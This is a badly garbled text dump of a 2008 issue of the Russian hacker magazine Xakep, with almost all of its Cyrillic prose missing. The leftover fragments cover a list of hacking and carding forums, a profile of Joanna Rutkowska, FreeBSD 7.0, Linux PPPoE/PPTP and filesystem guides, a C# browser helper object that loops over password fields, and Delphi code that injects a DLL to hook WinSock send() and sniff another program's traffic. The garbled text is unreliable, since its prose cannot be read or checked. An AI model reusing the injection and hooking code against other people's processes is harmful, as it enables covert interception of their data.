,
, ,

, ,

. :
30 . ,
:). automationbox.
com/ru/downloads.html, DVD.
: AutomationBox Tools
: Windows 2000/XP
: AutomationBox

AutomationBox Tools.
, , :
abtplay
abtcapture
( )
abtcontrol
abtscrshot
,
MouseRobot .
, , ,
. ,
. , ,
.
AutomationBox Tools . z
075
>>
Johnny Insider
/ magazine@real.xakep.ru /

. .

, .
forum.xakep.ru
() .
: nikitoz, step, forb, gorl, dlinij, , - ,
. .
8 , ,
- .
, - , , .
. , ?
, . , .
-. ,
. .
,

,
.
.
wasm.ru/forum
. .
inattack ... ,
;).
-
.
, , .
,
][ , .
Wasm .
.
. ,
, .
,
- .
15.
( - z0mbie). , ?
076
x 05 /113/ 08
>>
forum.antichat.ru
forum.web-hack.ru
forum.xakep.ru
forum.zloy.org
forum.asechka.ru
xakepy.ru
cardingworld.cc
cracklab.ru
wasm.ru/forum
damagelab.org
forum.inattack.ru
exploit.in
verified.ru
forum.mazafaka.ru
carder.info
hackzona.ru
security-teams.net
hackeveryday.com
reng.ru
kiber-zona.org
dkcs.qwhost.net
rootkits.ru
0
100000
200000
300000
400000
500000
( 2008)
forum.antichat.ru
. , , ,
. , .
(
).
-: vpn, , , , ftp, .. .
.
.
, .
, .
- . - 100
, .
forum.web-hack.ru
-
. , , .
-, . ,
. ,
.
, , ,
.. 4 20,
.
: , , -, ..
, .
x 05 /113/ 08
077
>>
forum.inattack.ru
rootkits , wasm , , , , inattack
. Pinch.
. ,
, . ,
;).
. . , IP
10 .
.
.
,
. - ,
2000. ,
150 .
xakepy.ru
, , -
.
,
.
xakepy.ru
ez!n3. , . , openvpn ;).

& , , - , . .
- ( ), black-
white- $30 .
, vBulletin RSS, .
VIP- .
4.5 .
exploit.in/forum
, , ,
, .
23 , , . .
mpack , ,
.
: ,
, - -, ,
.
. VMware .
, .

, . .
078
x 05 /113/ 08
>>
rootkits.ru
,
.
, - (). , .
,
, . - . ,
, , .
kernel- . ,
.
wasm,
rsdn rootkits.ru.
, - ,
. , , .
cracklab.ru
, , .. .
,
- PE- .
, , .
cracklab , :

, ;

, ;

;

.
. z
x 05 /113/ 08
079
>>
X-Profile
Mifrill
/ mifrill@riddick.ru /
(Joanna
Rutkowska) , . :
. , , , ,
Microsoft Blue Pill?
:
: 27
: Windows
Vista: Blue Pill; , 2006
-5

, . . (Warsaw University of
Technology), . , 5%
. (
11 ) - , . , ,

.
PC AT, 2 ,
40 Hercules.
, , ,
.
, . , , ,
etc.
.

Phrack (http://www.phrack.org/)
.

stack-smashing , (
080
). , , Phrack' .

. . ,
, -
.
. , .
.
, , . ,
,
. ,
.

,
COSEINC.
, , , .
COSEINC Blue Pill,
.
,
Advanced Malware Labs. ,
.
. ,
x 05 /113/ 08
>>
Black Hat 2006
, . -,
, , ,
-. ,
Vista, , , Linux
COSEINC . .
.
. , (
) (hyper-visor) .
Blue pill,
.
, -
Vista. SyScan ( 2006,
), , 3 , Black Hat .
, Microsoft
( , , , , , , ), .
, Blue pill 100% , ,
, , , . x 05 /113/ 08
, (Thomas Ptacek)
, (Nate Lawson)
(Peter Ferrie).
.
, , . , ,
Black Hat 2007.
.
, .
. , . ,
( ) ... ,
$200 (sic!) . , ,
, 8 20
, $384000. .
:
$384000 , ?
.
, ,
, . ,
2006 eWeek ,
,
081
>>
links
bluepillproject.org
Blue pill.
invisiblethingslab.
com ITL.
invisiblethings.org

ITL.
theinvisiblethings.
blogspot.com
.
.
.

.
Microsoft, ,
.
, , ,
100% , -. , ,
,

, ,

. ,
.

, : . ,
,
, , ,
- ,
.
.

2007 COSEINC. ,
,
Blue pill. .
-.
Invisible Things Lab
.
, ITL aka 90210, , .
COSEINC,
Advanced Malware Labs.
ITL .

. ,
Phoenix
Technologies,
. , ,
:
,
.
ITL (
), ,
. , .
- , .

.

, ,
, ,
.
. , .
(
). ,
: ,
. ,
. :).
,
,
. , , , , .

Vista. , , , open source
. ,

open source , , , Vista
. ,
Unix' MAC OS
. ,
, , .
, , -... ,
. ,
-,
IT. z
082
x 05 /113/ 08
>>

ADSL-.
gorl,
20"
.
1 .

Thermaltake
6 ,
4
;).
Asus S200.
5, - eeePC.
,
.

Apple Cinema
23".
C,

Apple. gorl .
.
Apple Mac Pro

Xeon 3 .
084
x 05 /113/ 08
>>

magazine@real.xakep.ru
( )
!
(zloy.unhack@gmail.com),
. , , . Unhack
Zloy Team.
, (sim@xakep.ru)
.
(xackich@xakep.ru).
, ?
(0n1x@xakep.ru>)
.
pluto (khooly@rambler.ru) ,
, .
blonx@xakep.ru .
x 05 /113/ 08
085
>> unixoid
turbina
/ v.turbina@gmail.com /
FreeBSD 7.0

FreeBSD,
.
. , , ...
.
FreeBSD
, FreeBSD.
1993 , (Berkeley Software
Distribution, BSD). ,
. BSD
,
( GNU GPL).
,
FreeBSD , , ,
. ,
.
, ,
,
. ,
FreeBSD , Linux.
FreeBSD CURRENT STABLE.
. ,
, , . STABLE,
086
, , .
STABLE
. STABLE
(RELEASE).
, 7.0, CURRENT
STABLE.

, FreeBSD 7.0,
(
).
(people.freebsd.org/~kris/scaling).
3.5 FreeBSD 6.x ~15%
, Linux 2.6.
?
, FreeBSD
.
, giant lock
. , , mplock,
. ,
x 05 /113/ 08
>> unixoid
, .
2000 SMPng (SMP next generation),

, . FreeBSD 5.0,
mplock
,
. ,
.
FreeBSD 5.3
,
,
(, VFS UFS
). , giant lock 7.0 (, NET_NEEDS_GIANT 2007).
FreeBSD ,
. ,
,
.
ULE
.
, ,
, CPU , ,
. ,
CPU, . , 7.0 4BSD sheduler:
% grep SCHED /usr/src/sys/conf/NOTES
options
SCHED_4BSD
#options
SCHED_ULE
, , . ULE
. , 7.1
. ,
SCHED_ULE. ULE
ULE 2.0 SCHED_
SMP (,
).
phkmalloc, 90 , ejmalloc (people.freebsd.org/~jasone/jemalloc),
SMP-.

FreeBSD ZFS (Zettabyte
File System), Sun
Microsystems Solaris. 128 ZFS
.
( LVM).
, , , , .
. , FreeBSD ZFS,
ACL
ZFS. , amd64,
i386 pc98. UDF
ZFS! ZFS
ZFSQuickStartGuide
(wiki.freebsd.org/ZFSQuickStartGuide).
. /boot
( single mode),
ZFS /boot/zfs,
x 05 /113/ 08
, ,
.
ZFS.
7.0 tmpfs,
NetBSD Google
Summer of Code. , .
Linux .
. ,
,
. ,
,
.
tmpfs, :
info

Beastie.
,
,
: Devilette
( daemonbabe,
daemoness)
.
# echo 'tmpfs_load="YES"' >> /boot/loader.conf

options TMPFS. , /tmp:

mount_*.

mount -t!
# mount -t tmpfs tmpfs /tmp

/etc/fstab.
0. fsck tmpfs
( ),
.
GEOM,
FreeBSD 5., GEOM_JOURNAL ( ). GEOM
. UFS ( UFS)
,
, (
fsck) .
gjournal(8).
, ,
.
, .
. ,
gjournal
Soft Updates. . , gjournal
(gmirror,
graid3), . ,
. UFS
gjournal :
# gjournal load

FreeBSD

,
DesktopBSD.

(sysutils/desktopbsdtools).

FreeBSD

18000 .
FreeBSD 8
:
ULE,
bsdlabel, 26 ,

GPT (GUID
partition tables),
,
Dtrace
.
GEOM-:
# gjournal label /dev/da0
newfs tunefs '-J '
:
# newfs -J /dev/da0.journal
# mount -o async /dev/da0.journal /mnt
async mount . 7.0
gjournal ,
087
sysinstall
. options
UFS_GJOURNAL. :
# echo 'geom_journal_load="YES"' >> /boot/loader.conf
,
, , gjournal
, .
gvirstor (wikitest.freebsd.org/gvirstor) GEOM- ,
( overcommit). ,
.
. /dev/
virstor/mydisk, ad5 ad6:
finstall
FreeBSD . , ,
, .
.
unionfs . 7.0
, ,
(people.freebsd.org/~daichi/unionfs) . ,
FreeBSD. , ,
CD-ROM :
# mount -t cd9660 -o ro /dev/acd0 /cdrom
# mount t unionfs -o noatime /var/cdrom /cdrom
# gvirstor label -v mydisk /dev/ad5 /dev/ad6

:
# newfs /dev/virstor/mydisk
/var/cdrom /cdrom
. ,
mount_* (mount_devfs, mount_ext2fs,
mount_linprocfs, mount_procfs, mount_linsysfs ..).
'-t'.

# gvirstor add mydisk ad7
, , remove, gvirstor list,
.
, .
GEOM_MULTIPATH (gmultipath)
, gmultipath. Linux
, XFS, , .
NFS (procfs )
,
.
unionfs
Finstall
Finstall . , sysinstall: LiveCD
. Python
PyGTK , front-end
back-end .
.

7.1 ( , finstall (ia64, pc98 PowerPC),
sysinstall ).
088
, ,
-, , . , sendfile()
TSO
, .
SCTP (Stream Control Transmission Protocol)
, GENERIC .
TSO (TCP/IP Segment Offload) LRO (Large Receive Offload)
TCP- ,
.
, .
TCP . 32 ,
. ,
10 . , 6.3 Open/NetBSD ,

lagg(4):
# ifconfig ed0 up
# ifconfig vr0 up
# ifconfig lagg0 create
# ifconfig lagg0 up laggproto lacp laggport ed0 laggport vr0
# ifconfig lagg0 192.168.1.200 netmask 255.255.255.0
# route add -net 0.0.0.0 192.168.1.1 0.0.0.0
FreeBSD Netgraph: ng_car , ng_deflate ng_pred1 deflate
predictor-1 PPP.
x 05 /113/ 08
>> unixoid
warning
,

,

!
,

.
MySQL
2005 KAME IPSec,

KAME OpenBSD

IPSec .
FAST_IPSEC . KAME , FAST_IPSEC IPv6
.
.
,
802.11 (Wi-Fi WiMax).
wicontrol, ,

ifconfig.
sysctl ,
.
, kern.conftxt , net.inet.
icmp.reply_from_interface ICMP IP, , kern.hostuuid
UUID.
TCP
.
sysctl, net.inet.tcp.
sendbuf_* net.inet.tcp.recvbuf_*:
(aka userland)
( TrustedBSD).
: AMD64, i386, ia64, pc98
PowerPC,
ARM UltraSparc T1, -
FreeBSD Sun
Niagara.
Bittorrent (torrents.freebsd.
org:8080), FTP (ftp://ftp.freebsd.
org/pub/FreeBSD). :
, ,
.
,
sysinstall. , ,
finstall (wiki.freebsd.org/finstall),
. .
Linuxulator, Linux

. Linu 2.6.16.
, (
2.4). ,
sysctl compat.linux.osrelease 2.6.16.
freebsd-update,
,
upgrade ( ).
, Dtrace, , ,
.
, ,
.
: KDE 3.5.8, GNOME 2.20.2, X.Org 7.3, GCC
4.2.1, BIND 9.4.2, Sendmail 8.14.2, OpenSSL 0.9.8e. ,
GCC ,
(Stack-Smashing Protector).
1.0 OpenBSM (Open Source
Basic Security Module), Sun BSM
,
, 7.0 , .

.
FreeBSD . ,
. z
net.inet.tcp.sendbuf_auto=1
net.inet.tcp.recvbuf_auto=1
x 05 /113/ 08
dvd

FreeBSD,

(www.
freebsd.org/doc),

. ,

.

FreeBSD

www.
onlamp.com.

ZFS
WiKi
wiki.freebsd.
org/ZFS.
089
>> unixoid
bober
/ zloy.bobr@gmail.com /
PPP
PPPoE PPTP Linux
C
PPPoE PPTP. , - Windows.
-? , . ,
PPPoE/PPTP,
KUbuntu.
PPPoE
PPPoE (Point-to-Point Protocol over Ethernet) PPP Ethernet .
/ xDSL
,
.
, (, , 2.3).
grep PPP /usr/src/linux/.config
, PPP.
PPPoE PPP
pppd
. PPPoE ,
: ppp, pppoe pppoeconf.
KUbuntu :
$ dpkg -s pppoeconf
Package: pppoeconf
Status: install ok installed
RPM rpm -qa | grep ppp.
Ethernet ADSL ( ). Ethernet
, .
/etc/network/interfaces.
$ sudo mcedit /etc/network/interfaces
# IP- DHCP,
:
iface eth0 inet dhcp
090
# IP :
iface eth1 inet static

address 192.168.0.25

network 192.168.0.0

gateway 192.168.0.1

netmask 255.255.255.0

mtu 1492
/etc/resolv.conf DNS ( ):
$ sudo mcedit /etc/resolv.conf
nameserver 111.33.44.55
nameserver 222.44.55.66
, , PPPoE
. . : /etc/ppp/pap-secrets ( chap-secrets,
CHAP ; *-secrets
) /etc/ppp/peers/dsl-provider. pon .
(K)Ubuntu pppoeconf.
sudo pppoeconf .
,
. Ethernet , PADI (PPPoE Active Discovery
Initiation), . pppoeconf dsl-provider. , , ,
. x 05 /113/ 08
>> unixoid
hide-password
#lcp-echo-interval 30
#lcp-echo-failure 4
noauth
#
persist
#
1492
mtu 1492
usepeerdns
, , , , , .
, :
pty "/usr/sbin/pppoe -I eth0 -T 80 -m 1452"
pptpconfig
pppoeconf /etc/network/interfaces,
:
/usr/bin/pon. ,
, , ,
/usr/sbin/pppd call $PROVIDER.
pon :
pon [OPTIONS] [provider] [arguments]
provider /etc/ppp/
peers. provider (
$PROVIDER). :
$ pon dsl-provider
, , (,
) .
. sudo, , ( Ubuntu
dip).
PPPoE
/etc/ppp/pap-secrets ( chapsecrets). ,
( pppoeconf):
user *
password
, pppoeconf .
/etc/ppp/peers/dsl-provider.
pppoeconf :
auto dsl-provider

iface dsl-provider inet ppp

provider dsl-provider
# added by pppoeconf
auto eth0

iface eth0 inet manual

pre-up /sbin/ifconfig eth0 up

PPPoE, . .
:
$ ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol

inet addr:157.33.34.178 P-t-P:192.168.101.1
Mask:255.255.255.255

UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1480
Metric:1

RX packets:283 errors:0 dropped:0 overruns:0
frame:0

TX packets:284 errors:0 dropped:0 overruns:0
carrier:0

collisions:0 txqueuelen:3

RX bytes:3004 (2.9 KiB) TX bytes:2744 (2.6 KiB)
/var/log/
messages.
:
$ tail f /var/log/messages
$ sudo mcedit /etc/ppp/peers/dsl-provider

noipdefault
#
defaultroute
replacedefaultroute
x 05 /113/ 08
, ,
. , route -n, ,
. , default, ppp0. , route add default
ppp0 : ?
091
>> unixoid
tkpppoe RP-PPPOE

,
, PAP (, PPPoE
, VPN ). ,
PPP, , . ,
(, ). ,
papsecrets . .
/etc/ppp/pap-secrets '*'
. :
user server1 password1
user server2 password2
, dsl-provider.
name remotename
.
name user
remotename server1
pon.
. , man HOWTO,
MTU MSS
MTU (Maximum Transmit Unit)
. ,
, ,
.
,
, , . . Ethernet 1518 , 14
4 ( 1500 ).
PPPoE 6 , PPP 2. MTU
PPPoE 1492.
TCP
Maximum Segment Size (MSS), TCP .
, MTU TCP IP (40). , MSS
Ethernet 1460, PPPoE 1452.
092
pppoeconf
options file.
, PPTP.
rp-pppoe
Mandriva, VectorLinux PPPoE
RP-PPPoE.
Ubuntu , . , .
www.roaringpenguin.
com/products/pppoe. tar.gz-,
: ./go-gui ./go,
. : , ,
, DNS, , .
: NONE (),
STANDALONE (, ) MASQUERADE (
).
:
** Summary of what you entered **
Ethernet Interface: eth1
User name: user
Activate-on-demand: No
Primary DNS: 111.33.44.55
Secondary DNS: 222.44.55.66
Firewalling: STANDALONE
, , .
: pppoe-relay, pppoe-setup,
pppoe-start, pppoe-stop, pppoe-connect, pppoe-server, pppoesniff, pppoe-status, pppoe-wrapper tkpppoe. ,
3.6 adsl-,
. HOWTO
.
, pppoestart; pppoe-stop;
pppoe-status.
pppoe-setup. tkpppoe.
PPTP
VPN PPTP (Point-to-Point Tunneling
Protocol) PPPoE. , -
MPPE, Linux PPTP,
.
, 2.6.13.
x 05 /113/ 08
>> unixoid
info
Linux 2.6.15
PPP MPPE

PPTP .

2.6.14, 2.6.15 PPP MPPE.

, , ,
GUI. ,
pptp, :
$ sudo apt-cache search pptp
pptp-linux Point-to-Point Tunneling Protocol
(PPTP) Client
knet The Knet is a frontend to pppd.
kvpnc vpn clients frontend for KDE
network-manager-pptp network management
framework (PPTP plugin)
refuse-eap
#refuse-chap
refuse-mschap
persist
#
maxfail 10
defaultroute
replacedefaultroute
/etc/ppp/chap-secrets :
user pptp password *
PPTP Client
(pptpclient.sourceforge.net).
Linux, *BSD. ,
PPTP: Windows VPN, Linux PopTop,
Cisco PIX .
, , .
$ sudo apt-get install pptp-linux
kernelpatch-mppe. ,
, .
, .
, , Canonical.
PPTP CD-
( ). PPTP
, .
, , sudo
apt-cdrom add. CD <Enter>.

:
$ sudo mcedit /etc/ppp/options.pptp
lock noauth nobsdcomp nodeflate
#
refuse-pap
x 05 /113/ 08
, :
domain\\user pptp password *
, ,
PPPoE:
$ sudo mcedit /etc/ppp/peers/pptp
# PPTP
pty "pptp 10.100.0.1 --nolaunchpppd"
connect /bin/true
name user
# chap-secrets
remotename pptp
#
file /etc/ppp/options.pptp
#require-mppe-128
require-mppe-40
ipparam pptp
. :
$ pon pptp
ifconfig. , ,
. PPTP , PPPoE.
:

Mandriva
PPPoE
PPTP
Mandriva
Linux,

(LAN, ISDN, ADSL).
/etc/ppp

.
Ubuntu

dip.
GNU/
Linux
PPPoE VPN

KUbuntu. ,
,

.
PPPoE
OpenBSD

, ][
#087.
093
>> unixoid
KVpnc VPN
PPPoE PPTP Mandriva
$ pon pptp debug dump logfd 2 nodetach

, .
, /etc/network/interfaces:
.
, Routing DNS ,
VPN .
PPTP Client pptpconfig . Ubuntu .
, /etc/apt/sources.list:
deb http://quozl.netrek.org/pptp/pptpconfig
./
dvd
$ sudo mcedit /etc/network/interfaces
auto tunnel
PPPoE
iface tunnel inet ppp
RFC 2516.

provider pptp
,
WiKi

ru.wikipedia.
org/wiki/PPPoE.

? .
Mandriva PPPoE PPTP Mandriva Linux, (LAN, ISDN, ADSL). ,
PPTP DSL PPPoE,
VPN, .
KUbuntu :
$ sudo apt-get install network-manager-pptp
kvpnc
KNetworkManager. ,
, ,
, , , . VPN, NetworkManager:
$ sudo /etc/dbus-1/event.d/25NetworkManager
restart
* Restarting network connection manager
NetworkManager [ OK ]
$ sudo /etc/dbus-1/event.d/26NetworkManagerDi
spatcher restart
* Restarting network events dispatcher
NetworkManagerDispatcher [ OK ]
. Configure
.
( peers),
IP- . Authentication
094
, :
$ sudo apt-get update
$ sudo apt-get install pptpconfig
$ sudo pptpconfig
,
. Server , ,
. Routing,
, ,
.
DNS ,
DNS.
Encryption (Require) . , , Miscellaneous

,
pppd pptp.
,
.
Start.
KVpnc (home.gna.org/kvpnc) VPN. Cisco VPN, IPSec, PPTP, OpenVPN, L2TP Vtun.
,
Profile New Profile (Wizard),

. , Select the type of your VPN
VPN ( Microsoft PPTP).

PPTP, . ,
. Network
route options : .
, , PPPoE PPTP . ! z
x 05 /113/ 08
>> unixoid

/ dhsilabs@mail.ru, www.dkws.org.ua /
Linux
, Linux, , ,
. Linux.
. , !

,
Linux, , (). , ,
. , .
. , ,
, , .
, , ( )
CD ISO9660.
,
.
. , Linux
open().
open(), ,
.
1. .
, .
glibc ( GNU C)
. glibc , , (, open(), read(), write(),
close()),
glibc, .
096
VFS .
.
, VFS,
(, open_ext3() , ext3, open_vfat() VFAT).
, VFS
.

1 Linux.
.
ext3. 512 .

.
, . .
1, 2 4 .
:
. , ,
. ,
1.
, ext3,
(. 2).
. 1024 x 05 /113/ 08
>> unixoid

...
}
1024 .
,
.
,
,
,
.
,
(
). ,
. ,
,

. , ,
.
() .
,
.
/usr/src/
linux/include/linux/fs.h:
struct super_block {

struct_head s_list; //

unsigned long s_blocksize;

struct file_system_type *s_type;

struct super_operations *s_op;

struct semaphore s_lock;
x 05 /113/ 08
int s_need_sync_fs;
(block bitmap) ,
,
- . 1 ,
.
, .

: ,
.

(inode), .
. ,
, .

.
,
. , .
, ,
.
?
4 , , , 1, 2
4 . , 256 1024 .
?
(double indirect block). ,
, ,
.
, -
,
, !
, ,
, . *nix ,
,
. ,
, . .
-, , ,
. (
) .
ls l. -,
. -,
.

( , ).
.
2 ( 1 ).
. ... ,
!

,
3.
?
, :
info
VFS

. VFS

.
inode

.
C dentry

inode,
,

,

.

.

.

,
][ #095,

.
097
>> unixoid
.2.
# dd if=/dev/zero of=fs.img bs=1k count=30000

. 1.
,
.
.

,
,

,
(. 4).
dd /dev/zero
fs.img. ,
(ANSI- 48), NULL (ANSI- 0)!
1 (bs=1k),
30000. ,
~30 , NULL.
losetup :
# losetup /dev/loop0 fs.img
/dev/loop0,
( ,
, , ).
/dev/loop0
mke2fs:

,

, .3. ext3

. mount,
umount. :
# mount t _ _

:
struct vfsmount {

struct list_head mnt_hash;

struct vfsmount *mnt_parent;

struct dentry *mnt_mountpoint;

struct dentry *mnt_root;

struct super_block *mnt_sb;

struct list_head mnt_mounts;

struct list_head mnt_child;

atomic_t mnt_count;

int mnt_flags;

char *mnt_devname;

struct list_head mnt_list;
}
mnt_list
. /etc/mtab.
# mke2fs -c /dev/loop0 30000

! /mnt/fs, :
# mkdir /mnt/fs
# mount -t ext2 /dev/loop0 /mnt/fs
/mnt/fs
. .

, .
losetup
'-o loop' mount, :
# mount -o loop -t ext2 fs.img /mnt/fs
, ,
umount:
# umount /mnt/fs
/dev/loop0:
# losetup -d /dev/loop0
Alcohol UltraISO Linux!

. , dd
, CD/DVD-:
# dd if=/dev/cdrom of=~/image.iso

Linux
, . :
098
CD-
image.iso.
x 05 /113/ 08
>> unixoid
- .
free, ,
.
,
.
links

Linux ,
.
mount, '--bind':
. 4.
# mount --bind _ _

.
( /mnt/fs
):
# mount -o loop -t iso9660 ~/image.iso /mnt/fs
/mnt/fs, .
ISO-
loop-. , , .
,

. ,
:
# mkdir /swap
# dd if=/dev/zero of=/swap/sw-file bs=1k
count=262144
# mkswap /swap/sw-file 262144
# swapon /swap/sw-file
256 .
. Linux
,
.
.

(ru.wikipedia.org)

,
.

: ext2, ext3,
reiserfs, fuse, sshfs.
Linux .
, LiveCD , ,
,
,
LiveCD. , :
# chroot _
:
# chroot /mnt/newroot
GRUB:
Windows MBR , Linux?
Linux - ! GRUB LiveCD
:
#
#
#
#
#
#
mkdir -p /old/dev
mount /dev/sdaX /old
mount --bind /dev /old/dev
chroot /old
/sbin/grub-install /dev/sda
reboot

,
Linux.
, , ,
.
, ,
//,
dhsilabs@mail.ru. z
5.
x 05 /113/ 08
6. -
099
>> coding

/ aleksandr-ehkkert@rambler.ru /
BHO.
- , Internet Explorer.
, C# Microsoft Visual Studio
. , .
COM Component Object Model
BHO
, ,
- .
! .
,
.
, (object linking
and embedding). , Microsoft,
OLE. OLE (dynamic data exchange DDE).
OLE 1 , DDE
Windows. , OLE 1, ,
. -, DDE . -, DDE . , DDE
. ,
- .
, , , , DDE.
OLE ,
100
, OLE. OLE
, ,
.
OLE , . , , , , .
, . API; ,
. Windows,
API . ,

. , .
.
(Distributed COM, DCOM)
Windows , .
, , !
. . x 05 /113/ 08
>> coding
,
. , .
. ,
, .

.
, ,
.
BHO?, . , BHO,
, -,
IObjectWithSite Internet
Explorer. Intrenet Explorer
, .
BHO?
, BHO
DLL-, Internet Explorer
( ,
Windows Shell).
, BHO
, IE . BHO
,
. ,
,
. ,
BHO
(). ,
.
BHO
BHO , . Internet Explorer
6 BHO ( ) ,
Internet Explorer 7 . BHO
,
WebBrowser, , HTML (, ).
, ...
BHO
BHO
IObjectWithSite. SetSite,
Internet Explorer
BHO (free).
,
CLSID BHO .
Class Library VS.

SHDocVw MSHTML ( SHDocVw shdocvw.dll, %systemroot%/
system32).
System.Runtime.InteropServices
Microsoft.Win32.
BHO (bugaga)
IObjectWithSite ( ,
GetSite SetSite) (functional),
x 05 /113/ 08
. ,
GetSite SetSite,
OnDocumentComplete.
CDHtmlDialog ( http://msdn2.microsoft.
com). WebBrowser
HTMLDocument.
-.

IE, GUID
IObjectWithSite FC4801A3-2BA9-11CF-A22900AA003D7352.
: HKEY_CLASSES_ROOT\Interface\{FC4801A32BA9-11CF-A229-00AA003D7352} HKEY_LOCAL_
MACHINE\SOFTWARE\Classes\Interface\{FC4801A32BA9-11CF-A229-00AA003D7352}.

IObjectWithSite [ComVisible(true)].
GUID , ,
BHO.
GetSite SetSite.
:
GetSite
public int GetSite(
ref Guid guid,
out IntPtr ppvSite)
{
IntPtr pointer =
Marshal.GetIUnknownForObject(webBrowser);
int face = Marshal.QueryInterface(
pointer, ref guid, out ppvSite);
Marshal.Release(pointer);
return face;
}
GetIUnknownForObject
IUnknown
. CLSID
BHO . DLL

IE BHO .
Visual Studio CLSID
. : BHO Internet
Explorer : HKEY_
LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Explorer\Browser Helper
Objects.
links
BHO

realcoding.net,
gotdotnet.ru , , MSDN.
dvd

C#

BHO.
info
BHO
COM,
,

COM: www.
podgoretsky.com/
classics.html.
RegAsm
101
>> coding
CLSID
: register BHO
[ComRegisterFunction].
RegAsm.exe /codebase.
!
CLSID. BHO!
:
BHO , , . BHO .
...

WebBrowser,
onBeforNavigate2.
, -,
:
public void OnBeforNavigate2 (ref objectTargetFrameName,
ref object PostData,
ref object Headers,
ref bool Cancel)
GUID
102
{
document = (mshtml.HTMLDocument)webBrowser.Document;
foreach(mshtml.IHTMLInputElement el
in document.getElementsByTagName("input"))
{
if(el.type.ToLower() == "password")
// ...
}
}
! BHO , . , BHO ,
COM-.

, BHO ,
, ,
.
BHO, , ,
. Enjoy! z
shdocvw.dll
x 05 /113/ 08
>> coding

/ vr-online.ru /
Delphi
FAQ :
, ?. Step WinSock hook IP Tools. WinSock hooker , .
, .

, , ,
. API- .
: , ?. PE-
, . ,
. PE
. ,
DLL,
,
Process Explorer. , DLL
Opera.exe.
Process
Explorer DLL WS2_32.dll.
WinSock API .
.
. , ,
, . .
API- .
:
1. . ,
. -
104
. PE- . ,
, ,
, . , .
,
. ,
.
2. . ,
.
-.
,
.
, .
, ,
. .
.

. API
,
.
:
x 05 /113/ 08
>> coding
, DLL
1. .
.
exe-.
InjectExe().
.
, DLL, .
ProcessExplorer, .
2. DLL.
. DLL,
, ,
. ,
.
DLL , . DLL.
,
. ,
, Delphi .

advHookApi,
Ms-Rem. ,
, . ,
. .
, .

, , .
1. .
. advHookAPI :
DLL .
InjectDll(), :
function InjectDll(Process: dword; ModulePath: PChar):
boolean;
, dll, .
true.
DLL. InjectDllEx() DLL
Dll .
(, firewall)
x 05 /113/ 08
function InjectExe(Process: dword;

Data: pointer): boolean;
:
1. (handle) , .
2. .
. InjectThisExe()
,
DLL. ,
.
.
function InjectThread(Process: dword; Thread: pointer;
Info: pointer; InfoLen: dword;
Results: boolean): THandle;
: 1. Process .
2. Thread , . 3. Info . 4. InfoLen .
5. Results ( true,
).
2. Windows API.
:
function HookCode(TargetProc, NewProc: pointer;
var OldProc: pointer): boolean;
.
: 1. TargetProc . 2. NewProc
, . 3.
OldProc , (,
). , DLL
, :
function HookProc(lpModuleName, lpProcName: PChar;
NewProc: pointer; var OldProc: pointer): boolean;
105
>> coding
: 1. (DLL). 2. ;
, . 3. -. 4. .
,
.
AdvApiHook UnhookCode(),
.
3. . API
, , .
. Windows,
NT,
System File Protection .
DisableSFC().
. .
. , , .
DLL
TerminateProceess() . .
, . . AdvApiHook
:
function DebugKillProcess(ProcessId: dword):Boolean;
pid . true.
, . ,
send().
Delphi , .
, DVD-,
AdvApiHook .
, .
SendData('', 10, addr(string(buf)), len);

result:=_pOldSend(s,buf,len,flags);
end;
library project1;
uses Windows, advApiHook, Messages, SysUtils;
type
TSocket=integer;
TSendProcedure=function (s: TSocket; var Buf;
len, flags: Integer): Integer; stdcall;
var
_pOldSend: TSendProcedure;
_hinst, _h:integer;
procedure SendData(data:string; funcType:integer;
Buff:pointer; len:integer);
var
d:TCopyDataStruct;
begin
case funcType of
10:
begin
d.lpData := Buff;
d.cbData := len;
d.dwData := 10;
end;
30:
begin
d.lpData := pchar(data);
d.cbData := length(data);
d.dwData := 30;
end;
end;
SendMessage(_h, WM_COPYDATA, 0, LongInt(@d));
End;
function xSend(s: TSocket; var Buf;
len, flags: Integer): Integer; stdcall;
begin
106
procedure DLLEntryPoint(dwReason: DWord);

begin
case dwReason of
DLL_PROCESS_ATTACH:
begin
SendData(' . ...', 30, nil, 0);
_hinst:=GetModuleHandle(nil);
StopThreads;
HookProc('WS2_32.dll','send',
@xSend,@_pOldSend);
SendData(' !',
30, nil, 0);
RunThreads;
end;
DLL_PROCESS_DETACH:
begin
SendData(' ...', 30, nil, 0);
UnhookCode(@_pOldsend);
end;
end;
end;
begin
_h:=findwindow(nil,'WinSock Sniffer');
if (_h = 0) then
begin
MessageBox(0, '
!', '!', 0);
ExitThread(0);
end;
DllProc := @DLLEntryPoint;
DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
x 05 /113/ 08
>> coding
ListView.
-. .
tlHelp32,
Delphi. GetAllProcess(). .
EnableDebugPrivilige().
,
. ,
.
handle . false,
.
.
API CreateToolHelp32
SnapShot(). ,
. TH32CS_SNAPPROCESS,
,
.
:
TH32CS_SNAPTHREAD ;
TH32CS_SNAPMODULE32 ;
TH32CS_SNAPALL , , .
CreateToolHelp32SnapShot() ,
,
ListView. Process32First()
Process32Next(). :
1. , CreateToolH
elp32SnapShot(). 2. TProcessEntry32, .
Process32First() ,
,
.
Process32Next().
, . GetAllProcess()
OnCreate . , ListView
.
, .
Delphi DLL DLL.

DLLEntryPoint. ,
DLL (/ ).
DLL_PROCESS_ATTACH.
. , ,

, , .
DLL. : .
x 05 /113/ 08
GetAllProcess()
var
_SnapList : THandle;
_ProcEntry : TProcessEntry32;
begin
if NOT (EnableDebugPrivilege()) Then
begin
reLog.SelAttributes.Color := clMaroon;
reLog.Lines.Add('
!');
end;
lvProcessList.Items.Clear;
_ProcEntry.dwSize := SizeOf(TProcessEntry32);
_SnapList := CreateToolHelp32SnapShot(
TH32CS_SNAPPROCESS, 0);
if (Process32First(_SnapList, _ProcEntry)) Then
begin
Repeat
with lvProcessList.Items.Add Do begin
Caption :=IntToStr(_ProcEntry.th32ProcessID);
SubItems.Add(ExtractFileName(
_ProcEntry.szExeFile));
end;
Until not (Process32Next(_SnapList,
_ProcEntry));
end;
CloseHandle(_SnapList);
end;
107
>> coding
( ) .
,
/, .
DLL
SendData().
. , . .
AdvAPIHook StopThreads().
. ,
. HookProc().
:
1. , . send(),
W32_32.dll (
WinSock API).
2. . send. ,
. ,
. .

Access Violtion.
3. .
xSend().
4. , . _pOldSend.
HookProc()
send() xsend(). ,
, - ,
.
, , , -,
, . ,
.
RunThreads(),
.
OnClick()
_h := OpenProcess(PROCESS_ALL_ACCESS, false,
